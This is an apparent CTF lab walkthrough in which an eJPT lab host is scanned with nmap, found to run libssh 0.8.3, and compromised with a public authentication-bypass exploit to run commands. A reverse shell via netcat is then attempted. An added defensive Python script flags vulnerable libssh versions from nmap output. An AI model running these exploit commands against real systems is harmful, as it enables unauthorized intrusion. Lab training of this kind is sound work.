Welcome to the Post-Exploitation CTF1 lab from eJPT. This walkthrough will guide you along the correct path through the lab.
Attacking IP: 192.81.171.2
Target1.ine.local - 192.81.171.4
Target2.ine.local - 192.81.171.3
Our first target wants us to go after the user account details to find our first flag. Let’s start enumerating.
nmap -sV -sC 192.81.171.4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-31 23:44 IST
Nmap scan report for target1.ine.local (192.81.171.4)
Host is up (0.000025s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh libssh 0.8.3 (protocol 2.0)
| ssh-hostkey:
|_ 2048 31:e2:1d:f1:b2:39:0c:a3:ec:db:01:4a:eb:a2:39:c7 (RSA)
MAC Address: 02:42:C0:51:AB:04 (Unknown)
port 22 - libssh
libssh isn’t a standard SSH service and is likely our way in. Let’s run searchsploit against it and see what we find.
searchsploit libssh
libSSH - Authentication Bypass | linux/remote/45638.py
LibSSH 0.7.6 / 0.8.4 - Unauthorized Access | linux/remote/46307.py
We’ll go ahead and bring the unauthorized access script to our system to use.
We can test this exploit, which bypasses authentication, by passing it a command to run on the target:
python3 46307.py target1.ine.local 22 whoami
user
It works! The command ran on the target without any credentials, which shows that the target is vulnerable to this exploit.
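For defenders, the nmap banner shown earlier is already enough to flag this host. The following added example (not part of the original walkthrough) parses `nmap -sV` output and reports libssh servers older than the fixed releases 0.7.6 and 0.8.4. The function names, the sample text and the second host are constructed, and the 0.6.0 lower bound is taken from the upstream libssh advisory rather than from this page.

```python
import re

# Upstream fixed the server-side authentication bypass in 0.7.6 and 0.8.4.
FIXED = {(0, 7): (0, 7, 6), (0, 8): (0, 8, 4)}
# Assumption from the upstream advisory (not on this page): 0.6.0 is the first
# affected release and the 0.6 branch never received a fixed version.
FIRST_AFFECTED = (0, 6, 0)

# Matches an nmap -sV service line, e.g. "22/tcp open ssh libssh 0.8.3 (protocol 2.0)"
SERVICE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+libssh\s+(\d+)\.(\d+)\.(\d+)", re.I)
REPORT = "Nmap scan report for "

# Constructed sample: first host is the lab target, second is a made-up patched host.
SAMPLE = """\
Nmap scan report for target1.ine.local (192.81.171.4)
22/tcp open  ssh     libssh 0.8.3 (protocol 2.0)
Nmap scan report for patched.example (192.0.2.10)
2222/tcp open  ssh     libssh 0.8.4 (protocol 2.0)
"""

def is_affected(version):
    """True if a libssh server version predates the fix for its branch."""
    if version < FIRST_AFFECTED:
        return False
    branch = version[:2]
    if branch in FIXED:
        return version < FIXED[branch]
    return branch < (0, 7)  # 0.6.x: affected; 0.9 and later: shipped with the fix

def triage(nmap_text):
    """Return (host, port, version) for every affected libssh service found."""
    findings, host = [], None
    for line in nmap_text.splitlines():
        line = line.strip()
        if line.startswith(REPORT):
            host = line[len(REPORT):]
        elif (m := SERVICE.match(line)):
            version = tuple(int(x) for x in m.groups()[1:])
            if is_affected(version):
                findings.append((host, int(m.group(1)), ".".join(map(str, version))))
    return findings

if __name__ == "__main__":
    for host, port, version in triage(SAMPLE):
        print(f"{host} port {port}: libssh {version} predates the fix, upgrade")
```

A banner version does not reflect distribution backports, so confirm a finding against the installed package's changelog before treating it as exposed.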
Now we will try to set up a reverse shell through the target. We’ll run the same command but use netcat instead of whoami:
python3 46307.py target1.ine.local 22 nc
sh: line 1: nc: command not found
This tells us that the system does not have nc installed. To proceed, we’ll next set up a listener on our attacking machine.